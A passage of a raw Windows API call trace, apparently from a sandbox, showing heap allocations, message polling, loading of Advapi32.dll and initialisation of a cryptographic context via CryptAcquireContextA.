[0238.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0238.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0238.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0238.291] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0238.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0238.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0238.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0238.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.292] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0238.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.292] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0238.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0238.292] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0238.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0238.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0238.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0238.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0238.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0238.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0238.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0238.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0238.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0238.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0238.293] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.293] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0238.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0238.294] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.294] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0238.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0238.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0238.295] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0238.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0238.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0238.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.295] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0238.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.295] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0238.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0238.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0238.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0238.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0238.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69be8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0238.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0238.296] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0238.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0238.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0238.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0238.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0238.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0238.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0238.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0238.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0238.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0238.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0238.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0238.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0238.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0238.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0238.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0238.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0238.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0238.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0238.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0238.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0238.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0238.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0238.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0238.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0238.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0238.360] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0238.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0238.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0238.360] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0238.360] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0238.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0238.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d28 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0238.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0238.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0238.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0238.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0238.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0238.361] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0238.361] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.361] HeapFree (in: hHeap=0x970000, 